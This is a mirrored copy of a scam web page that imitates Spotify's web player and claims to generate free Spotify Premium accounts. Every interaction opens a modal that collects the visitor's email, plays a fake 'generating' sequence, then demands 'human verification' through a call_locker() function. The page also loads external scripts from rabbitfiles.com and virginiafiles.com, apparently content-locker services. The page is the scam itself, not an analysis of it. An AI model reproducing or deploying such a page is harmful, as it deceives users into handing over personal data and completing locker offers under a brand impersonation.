<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from spotprem.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 21 Feb 2019 22:16:06 GMT -->

<!-- Mirrored from spotifypro.live/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 22 May 2019 16:55:29 GMT -->
<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Spotify</title>
	<meta name="description" content="Spotify Premium - Generator" />
	<meta name="keywords" content="" />
	<meta name="author" content="" />

	<!-- Open Graph Social Meta Tags-->
	<meta property="og:title" content="Spotify Premium - Generator" /> <!-- Title which is displayed when your site is shared on social networks -->
	<meta property="og:description" content="Spotify Premium - Generator" /> <!-- Website description which is displayed when your site is shared on social networks -->
	<meta property="og:type" content="website" />
	<meta property="og:url" content="http://www.mywebsiteurl.com/" /> <!-- Your Website URL -->
	<meta property="og:image" content="social-share-image.html" />	<!-- Absolute Path to the Image which will display, when your website is shared on social networks -->

	<link rel="stylesheet" href="images/bootstrap.min.css">
	<link rel="stylesheet" href="images/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
	<link rel="stylesheet" type="text/css" href="images/css7f297f29.css?family=Lato:400,700">
	<link rel="stylesheet" href="images/animate.min.css">
	<link href="images/select2.min.css" rel="stylesheet" />
	<link rel="stylesheet" type="text/css" href="images/style.css" />
	<link rel="icon" type="image/png" href="favicon.html" />
	<script type="text/javascript" id="ogjs" src="https://www.rabbitfiles.com/cl.php?id=ccf59f697caf0699fb80402521eadcae"></script>
	<script type="text/javascript">
	/*
		document.ondragstart = noselect; 
		document.onselectstart = noselect;
		document.oncontextmenu = noselect;
		function noselect() {return false;} */
	</script>
</head>
<body>

<div id="home">
	<div class="bg-main"></div>
	<nav class="nav flex-column navbar justify-content-start align-items-start">
		<svg viewBox="0 0 1134 340" class="spotify-logo mb-4"><title>Spotify</title><path fill="currentColor" d="M8 171c0 92 76 168 168 168s168-76 168-168S268 4 176 4 8 79 8 171zm230 78c-39-24-89-30-147-17-14 2-16-18-4-20 64-15 118-8 162 19 11 7 0 24-11 18zm17-45c-45-28-114-36-167-20-17 5-23-21-7-25 61-18 136-9 188 23 14 9 0 31-14 22zM80 133c-17 6-28-23-9-30 59-18 159-15 221 22 17 9 1 37-17 27-54-32-144-35-195-19zm379 91c-17 0-33-6-47-20-1 0-1 1-1 1l-16 19c-1 1-1 2 0 3 18 16 40 24 64 24 34 0 55-19 55-47 0-24-15-37-50-46-29-7-34-12-34-22s10-16 23-16 25 5 39 15c0 0 1 1 2 1s1-1 1-1l14-20c1-1 1-1 0-2-16-13-35-20-56-20-31 0-53 19-53 46 0 29 20 38 52 46 28 6 32 12 32 22 0 11-10 17-25 17zm95-77v-13c0-1-1-2-2-2h-26c-1 0-2 1-2 2v147c0 1 1 2 2 2h26c1 0 2-1 2-2v-46c10 11 21 16 36 16 27 0 54-21 54-61s-27-60-54-60c-15 0-26 5-36 17zm30 78c-18 0-31-15-31-35s13-34 31-34 30 14 30 34-12 35-30 35zm68-34c0 34 27 60 62 60s62-27 62-61-26-60-61-60-63 27-63 61zm30-1c0-20 13-34 32-34s33 15 33 35-13 34-32 34-33-15-33-35zm140-58v-29c0-1 0-2-1-2h-26c-1 0-2 1-2 2v29h-13c-1 0-2 1-2 2v22c0 1 1 2 2 2h13v58c0 23 11 35 34 35 9 0 18-2 25-6 1 0 1-1 1-2v-21c0-1 0-2-1-2h-2c-5 3-11 4-16 4-8 0-12-4-12-12v-54h30c1 0 2-1 2-2v-22c0-1-1-2-2-2h-30zm129-3c0-11 4-15 13-15 5 0 10 0 15 2h1s1-1 1-2V93c0-1 0-2-1-2-5-2-12-3-22-3-24 0-36 14-36 39v5h-13c-1 0-2 1-2 2v22c0 1 1 2 2 2h13v89c0 1 1 2 2 2h26c1 0 1-1 1-2v-89h25l37 89c-4 9-8 11-14 11-5 0-10-1-15-4h-1l-1 1-9 19c0 1 0 3 1 3 9 5 17 7 27 7 19 0 30-9 39-33l45-116v-2c0-1-1-1-2-1h-27c-1 0-1 1-1 2l-28 78-30-78c0-1-1-2-2-2h-44v-3zm-83 3c-1 0-2 1-2 2v113c0 1 1 2 2 2h26c1 0 1-1 1-2V134c0-1 0-2-1-2h-26zm-6-33c0 10 9 19 19 19s18-9 18-19-8-18-18-18-19 8-19 18zm245 69c10 0 19-8 19-18s-9-18-19-18-18 8-18 18 8 18 18 18zm0-34c9 0 17 7 17 16s-8 16-17 16-16-7-16-16 7-16 16-16zm4 18c3-1 5-3 5-6 0-4-4-6-8-6h-8v19h4v-6h4l4 6h5zm-3-9c2 0 4 1 4 3s-2 3-4 3h-4v-6h4z"></path></svg>
		<i class="fab fa-spotify mb-4 spotify-logo-small"></i>
		<a class="nav-link" href="#" page-name="search-page"><svg viewBox="0 0 512 512" width="24" height="24" xmlns="http://www.w3.org/2000/svg"><path d="M349.714 347.937l93.714 109.969-16.254 13.969-93.969-109.969q-48.508 36.825-109.207 36.825-36.826 0-70.476-14.349t-57.905-38.603-38.603-57.905-14.349-70.476 14.349-70.476 38.603-57.905 57.905-38.603 70.476-14.349 70.476 14.349 57.905 38.603 38.603 57.905 14.349 70.476q0 37.841-14.73 71.619t-40.889 58.921zM224 377.397q43.428 0 80.254-21.461t58.286-58.286 21.461-80.254-21.461-80.254-58.286-58.285-80.254-21.46-80.254 21.46-58.285 58.285-21.46 80.254 21.46 80.254 58.285 58.286 80.254 21.461z" fill="currentColor" fill-rule="evenodd"></path></svg><span> Search</span></a>
		<a class="nav-link active" href="#" page-name="home-page"><svg viewBox="0 0 512 512" width="24" height="24" xmlns="http://www.w3.org/2000/svg"><path d="M448 463.746h-149.333v-149.333h-85.334v149.333h-149.333v-315.428l192-111.746 192 110.984v316.19z" fill="currentColor"></path></svg><span> Home</span></a>
		<a class="nav-link" href="#" page-name="library-page"><svg viewBox="0 0 512 512" width="24" height="24" xmlns="http://www.w3.org/2000/svg"><path d="M291.301 81.778l166.349 373.587-19.301 8.635-166.349-373.587zM64 463.746v-384h21.334v384h-21.334zM192 463.746v-384h21.334v384h-21.334z" fill="currentColor"></path></svg><span>Your library</span></a>
	</nav>
	<section id="home-page">
		<div class="content">
			<div class="container-fluid">
				<ul class="nav nav-tabs justify-content-center" id="myTab" role="tablist">
				  <li class="nav-item">
					<a class="nav-link active" id="ftr-tab" data-toggle="tab" href="#ftr" role="tab" aria-controls="ftr" aria-selected="true" color-style="1">FEATURED</a>
				  </li>
				  <li class="nav-item">
					<a class="nav-link" id="pod-tab" data-toggle="tab" href="#pod" role="tab" aria-controls="pod" aria-selected="false" color-style="2">PODCASTS</a>
				  </li>
				  <li class="nav-item">
					<a class="nav-link" id="gam-tab" data-toggle="tab" href="#gam" role="tab" aria-controls="gam" aria-selected="false" color-style="3">GENRES & MOODS</a>
				  </li>
				</ul>
				<div class="tab-content" id="myTabContent">
				  <div class="tab-pane fade show active" id="ftr" role="tabpanel" aria-labelledby="ftr-tab">
					<div class="section featured mb-3">
						<h2 class="title">Featured</h2>
						<div class="row row-2">
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Pop Rising">
									<img src="images/1.jpg">
									Pop Rising
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="¡Viva Latino!">
									<img src="images/2.jpg">
									¡Viva Latino!
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="mint">
									<img src="images/3.jpg">
									mint
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Low-Key">
									<img src="images/4.jpg">
									Low-Key
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Winter Acoustic">
									<img src="images/5.jpg">
									Winter Acoustic
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Rock Hard">
									<img src="images/6.jpg">
									Rock Hard
								</a>
							</div>

							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Rock This">
									<img src="images/7.jpg">
									Rock This
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="RapCaviar">
									<img src="images/8.jpg">
									RapCaviar
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Quiet Hours">
									<img src="images/9.jpg">
									Quiet Hours
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Chilled R&B">
									<img src="images/10.jpg">
									Chilled R&B
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Electronic Christmas">
									<img src="images/11.jpg">
									Electronic Christmas
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Jazz Vibes">
									<img src="images/12.jpg">
									Jazz Vibes
								</a>
							</div>
						</div>
					</div>
					<div class="section featured">
						<h2 class="title">Charts</h2>
						<div class="row row-2">
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="United States Top 50">
									<img src="images/regional_us_default.jpg">
									United States Top 50
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Global Top 50">
									<img src="images/regional_global_default.jpg">
									Global Top 50
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Global Viral 50">
									<img src="images/viral_global_default.jpg">
									Global Viral 50
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="United States Viral 50">
									<img src="images/viral_us_default.jpg">
									United States Viral 50
								</a>
							</div>
						</div>
					</div>
				  </div>
				  <div class="tab-pane fade" id="pod" role="tabpanel" aria-labelledby="pod-tab">
					<div class="section featured">
						<h2 class="title">Top podcasts</h2>
						<div class="row row-2">
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="The Joe Budden Podcast with Rory & Mal">
									<img src="images/1-2.jpg">
									The Joe Budden Podcast with Rory & Mal
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="My Favorite Murder with Karen Kilgariff and Georgia Hardstark">
									<img src="images/regional_global_default.jpg">
									My Favorite Murder with Karen Kilgariff and Georgia Hardstark
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Pardon my Take">
									<img src="images/3-2.jpg">
									Pardon my Take
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="VIEWS with David Dobrik and Jason Nash">
									<img src="images/4-2.jpg">
									VIEWS with David Dobrik and Jason Nash
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="The Misfits Podcast">
									<img src="images/5-2.jpg">
									The Misfits Podcast
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Last Podcast on the Left">
									<img src="images/6-2.jpg">
									Last Podcast on the Left
								</a>
							</div>

							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Stuff You Should Know">
									<img src="images/7-2.jpg">
									Stuff You Should Know
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="And That's Why We Drink">
									<img src="images/8-2.jpg">
									And That's Why We Drink
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="My Brother, My Brother And Me">
									<img src="images/9-2.jpg">
									My Brother, My Brother And Me
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Armchair Expert with Dax Shepard">
									<img src="images/10-2.jpg">
									Armchair Expert with Dax Shepard
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Crime Junkie">
									<img src="images/11-2.jpg">
									Crime Junkie
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Pod Save America">
									<img src="images/12-2.jpg">
									Pod Save America
								</a>
							</div>
						</div>
					</div>
					<div class="section categories">
						<h2 class="title">Categories</h2>
						<div class="row row-2">
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Stories">
									<img src="1.html">
									Stories
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Educational">
									<img src="2.html">
									Educational
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Comedy">
									<img src="3.html">
									Comedy
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Music">
									<img src="4.html">
									Music
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="News & Politics">
									<img src="5.html">
									News & Politics
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Arts & Entertainment">
									<img src="6.html">
									Arts & Entertainment
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Sports & Recreation">
									<img src="7.html">
									Sports & Recreation
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Lifestyle & Health">
									<img src="8.html">
									Lifestyle & Health
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Games">
									<img src="9.html">
									Games
								</a>
							</div>
						</div>
					</div>
				  </div>
				  <div class="tab-pane fade" id="gam" role="tabpanel" aria-labelledby="gam-tab">
						<h2 class="title">Genres & Moods</h2>
						<div class="row row-2">
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Happy Holidays">
									<img src="images/1-3.jpg">
									Happy Holidays
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Pop">
									<img src="images/2-2.jpg">
									Pop
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Hip-Hop">
									<img src="images/3-3.jpg">
									Hip-Hop
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Mood">
									<img src="images/4-3.jpg">
									Mood
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Workout">
									<img src="images/5-3.jpg">
									Workout
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Decades">
									<img src="images/6-3.jpg">
									Decades
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Arab">
									<img src="images/7-3.jpg">
									Arab
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Country">
									<img src="images/8-3.jpg">
									Country
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Focus">
									<img src="images/9-3.jpg">
									Focus
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Latin">
									<img src="images/10-3.jpg">
									Latin
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Chill">
									<img src="images/11-3.jpg">
									Chill
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Dance/Electronic">
									<img src="images/12-3.jpg">
									Dance/Electronic
								</a>
							</div>


							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="R&B">
									<img src="images/13.jpg">
									R&B
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Rock">
									<img src="images/14.jpg">
									Rock
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Indie">
									<img src="images/15.jpg">
									Indie
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Folk & Acoustic">
									<img src="images/16.jpg">
									Folk & Acoustic
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Party">
									<img src="images/17.jpg">
									Party
								</a>
							</div>
							<div class="col-xs-6 col-sm-4 col-md-3 col-lg-2 col-xl-2 px-2 text-center">
								<a href="#" title="Sleep">
									<img src="images/18.jpg">
									Sleep
								</a>
							</div>
						</div>
				  </div>
				  <!--
				  <div class="tab-pane fade" id="nrl" role="tabpanel" aria-labelledby="nrl-tab">...</div>
				  <div class="tab-pane fade" id="disc" role="tabpanel" aria-labelledby="disc-tab">...</div>
				  -->
				</div>
			</div>
		</div>
	</section>
	<section id="search-page">
		<div class="content">
			<div class="container-fluid p-0">
				<div class="search-wrapp w-100">
					<input type="text" class="SearchInputBox__input" placeholder="Start typing..." value="">
				</div>
				<div class="text-center mt-4">
					<h2 class="title mb-2">Search Spotify</h2>
					Find your favorite songs, artists, albums, podcasts and playlists.
				</div>
			</div>
		</div>
	</section>
</div>

<div class="player-login-wrapp">
	<div class="login-wrapp">
		<div class="icon-text">
			<svg width="77" height="77" xmlns:xlink="http://www.w3.org/1999/xlink" class="_3N3sBg4DOXFrn36uihVI8Q"><title>Clock</title><defs><circle id="b" cx="34.5" cy="34.5" r="34.5"></circle><filter x="-8.7%" y="-8.7%" width="117.4%" height="117.4%" filterUnits="objectBoundingBox" id="a"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.5 0" in="shadowBlurOuter1"></feColorMatrix></filter><circle id="d" cx="35.5" cy="35.5" r="28.5"></circle><filter x="-10.5%" y="-10.5%" width="121.1%" height="121.1%" filterUnits="objectBoundingBox" id="c"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.5 0" in="shadowBlurOuter1"></feColorMatrix></filter><circle id="f" cx="34.5" cy="34.5" r="22.5"></circle><filter x="-13.3%" y="-13.3%" width="126.7%" height="126.7%" filterUnits="objectBoundingBox" id="e"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.2 0" in="shadowBlurOuter1"></feColorMatrix></filter></defs><g fill="none" fill-rule="evenodd"><g opacity="0.05" fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#a)" xlink:href="#b"></use><use fill="#FFF" xlink:href="#b"></use></g><g opacity="0.1" fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#c)" xlink:href="#d"></use><use fill="#FFF" xlink:href="#d"></use></g><g fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#e)" xlink:href="#f"></use><use fill="#FFF" xlink:href="#f"></use></g><path d="M38 21.375c-9.182 0-16.625 7.443-16.625 16.625S28.818 54.625 38 54.625 54.625 47.182 54.625 38 47.182 21.375 38 21.375zm0 32.063c-8.512 0-15.438-6.926-15.438-15.438S29.489 22.562 38 22.562 53.438 29.489 53.438 38 46.511 53.438 38 53.438zm.594-27.313h-1.188V38.594h8.906v-1.188h-7.718V26.125z" fill="#AF2896" fill-rule="nonzero"></path><path d="M57 19v38H19V19z"></path></g></svg>
			<div class="text">
				<div class="title">
					Preview of Spotify
				</div>
				<div class="description">
					Press "Get Premium" button to make account PREMIUM for FREE. No credit card needed.
				</div>
			</div>
		</div>
		<div class="button">
			<button class="btn btn-primary no-focus-outline make-premium" type="button">Get Premium</button>
		</div>
	</div>
	<div class="player-wrapp py-3">
		<div class="container-fluid">
			<div class="row">
				<div class="col-12 col-md-0 col-lg-4">
				</div>
				<div class="col-12 col-sm-8 col-lg-4">
					<div class="control-buttons d-flex flex-row justify-content-center pb-2">
						<button class="control-button shuffle" title="Enable shuffle"><i class="fas fa-random"></i></button>
						<button class="control-button skip-back" title="Previous"><i class="fas fa-step-backward"></i></button>
						<button class="control-button play control-button--circled" title="Play"><i class="fas fa-play"></i></button>
						<button class="control-button skip-forward" title="Next"><i class="fas fa-step-forward"></i></button>
						<button class="control-button repeat" title="Enable repeat"><i class="fas fa-redo-alt"></i></button>
					</div>
					<div class="song-progress d-flex flex-row justify-content-center align-items-center">
						<div class="full-time">0:00</div>
						<div class="line-time w-100"></div>
						<div class="now-time">0:00</div>
					</div>
				</div>
				<div class="col-12 col-sm-4 d-flex justify-content-end align-items-center">
					<div class="volume-wrapp d-flex justify-content-end align-items-center">
						<button class="control-button volume mr-0">
							<i class="fas fa-volume-up"></i>
						</button>
						<div class="volume-line"></div>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>

<div class="modal fade" id="makePremium" tabindex="-1" role="dialog" aria-labelledby="makePremiumTitle" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered" role="document">
    <div class="modal-content">
      <div class="modal-header">
		<div class="login-wrapp p-2">
			<svg width="77" height="77" xmlns:xlink="http://www.w3.org/1999/xlink" class="_3N3sBg4DOXFrn36uihVI8Q"><title>Clock</title><defs><circle id="b" cx="34.5" cy="34.5" r="34.5"></circle><filter x="-8.7%" y="-8.7%" width="117.4%" height="117.4%" filterUnits="objectBoundingBox" id="a"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.5 0" in="shadowBlurOuter1"></feColorMatrix></filter><circle id="d" cx="35.5" cy="35.5" r="28.5"></circle><filter x="-10.5%" y="-10.5%" width="121.1%" height="121.1%" filterUnits="objectBoundingBox" id="c"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.5 0" in="shadowBlurOuter1"></feColorMatrix></filter><circle id="f" cx="34.5" cy="34.5" r="22.5"></circle><filter x="-13.3%" y="-13.3%" width="126.7%" height="126.7%" filterUnits="objectBoundingBox" id="e"><feOffset in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.2 0" in="shadowBlurOuter1"></feColorMatrix></filter></defs><g fill="none" fill-rule="evenodd"><g opacity="0.05" fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#a)" xlink:href="#b"></use><use fill="#FFF" xlink:href="#b"></use></g><g opacity="0.1" fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#c)" xlink:href="#d"></use><use fill="#FFF" xlink:href="#d"></use></g><g fill-rule="nonzero" transform="translate(4 4)"><use fill="#000" filter="url(#e)" xlink:href="#f"></use><use fill="#FFF" xlink:href="#f"></use></g><path d="M38 21.375c-9.182 0-16.625 7.443-16.625 16.625S28.818 54.625 38 54.625 54.625 47.182 54.625 38 47.182 21.375 38 21.375zm0 32.063c-8.512 0-15.438-6.926-15.438-15.438S29.489 22.562 38 22.562 53.438 29.489 53.438 38 46.511 53.438 38 53.438zm.594-27.313h-1.188V38.594h8.906v-1.188h-7.718V26.125z" fill="#AF2896" fill-rule="nonzero"></path><path d="M57 19v38H19V19z"></path></g></svg>
			<div class="text">
				<h2 class="title">
					Make premium
				</h2>
				<div class="description">
					Make your account PREMIUM for FREE
				</div>
			</div>
			<button type="button" class="close" data-dismiss="modal" aria-label="Close">
			  <span aria-hidden="true">&times;</span>
			</button>
		</div>
      </div>
      <div class="modal-body">
		  <div class="window1">
			<h1>Spotify Premium</h1>
			<span class="free mb-4">FREE</span>
			<ol>
				<li class="P57N0_WwxF-4qgYIorl2d"><svg xmlns:xlink="http://www.w3.org/1999/xlink" class="modal-icon" width="16" height="16" viewBox="0 0 16 18"><polygon points="13.985,2.383 5.127,12.754 1.388,8.375 0.73,9.145 5.127,14.294 14.745,3.032"></polygon></svg>Listen offline and on the go</li>
				<li class="P57N0_WwxF-4qgYIorl2d"><svg xmlns:xlink="http://www.w3.org/1999/xlink" class="modal-icon" width="16" height="16" viewBox="0 0 16 18"><polygon points="13.985,2.383 5.127,12.754 1.388,8.375 0.73,9.145 5.127,14.294 14.745,3.032"></polygon></svg>Get unlimited podcasts</li>
				<li class="P57N0_WwxF-4qgYIorl2d"><svg xmlns:xlink="http://www.w3.org/1999/xlink" class="modal-icon" width="16" height="16" viewBox="0 0 16 18"><polygon points="13.985,2.383 5.127,12.754 1.388,8.375 0.73,9.145 5.127,14.294 14.745,3.032"></polygon></svg>Play your favorite music, ad-free</li>
			</ol>
			<label class="w-100 my-2" style="font-size: 12px;"> Type your profile E-mail
				<input type="email" name="email" class="form-control w-100 rounded-0 mt-2">
			</label>
			<button class="btn btn-succes" id="generate_btn">Get premium for free</button>
		  </div>
		  <div class="window2" style="display: none;">
			<div class="text-center preloader"><img src="images/preloader.gif"></div>
			<div class="loader-wrapp">
				<div id="text-loader">
                 <span class="text-danger">Congratulations</span>
				</div>
				<div id="loader"><span></span></div>
				<div class="text text-center mt-3" style="display: none;">To prevent bots from abusing our generator, please verify that you are a human! </div>
				<button class="btn btn-succes success-colored" id="verification" style="display: none;"onclick="call_locker();window.location =">Verify</button>
				<div class="ads"></div>
			</div>
		  </div>
      </div>
    </div>
  </div>
</div>


<script src="images/jquery-3.3.1.min.js"></script>
<script src="images/popper.min.js"></script>
<script src="images/bootstrap.min.js"></script>
<script src="images/select2.min.js"></script>
<script type="text/javascript" src="https://virginiafiles.com/script_include.php?id=808345"></script>
<script src="images/main.js"></script>
<script>
$('.make-premium, #myTabContent a').click(function(){
	$('#makePremium').modal('show');
	return false;
});
$('.nav-tabs .nav-link').click(function(){
	var color = $(this).attr('color-style');
	if(color == 1){
		$('.bg-main').css('background-image', 'linear-gradient(rgb(33, 120, 48), rgb(3, 12, 5) 85%)');
	}
	if(color == 2){
		$('.bg-main').css('background-image', 'linear-gradient(rgb(86, 72, 67), rgb(9, 7, 7) 85%)');
	}
	if(color == 3){
		$('.bg-main').css('background-image', 'linear-gradient(rgb(17, 49, 40), rgb(4, 11, 9) 85%)');
	}
});
$('.navbar a').click(function(){
	var page = $(this).attr('page-name');
	if(page == 'search-page'){
		$('.bg-main').css('background-image', 'linear-gradient(rgb(30, 50, 100), rgb(4, 6, 12) 85%)');
	}
	if(page == 'home-page'){
		$('.bg-main').css('background-image', 'linear-gradient(rgb(33, 120, 48), rgb(3, 12, 5) 85%)');
	}
	if(page == 'library-page'){
		$('#makePremium').modal('show');
		return false;
	}
	$('.navbar a').removeClass('active');
	$(this).addClass('active');
	$('section').fadeOut();
	$('#' + page).fadeIn();
});
$('.SearchInputBox__input').keyup(function(){
	$('#makePremium').modal('show');
});

</script>
</body>

<!-- Mirrored from spotprem.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 21 Feb 2019 22:17:54 GMT -->

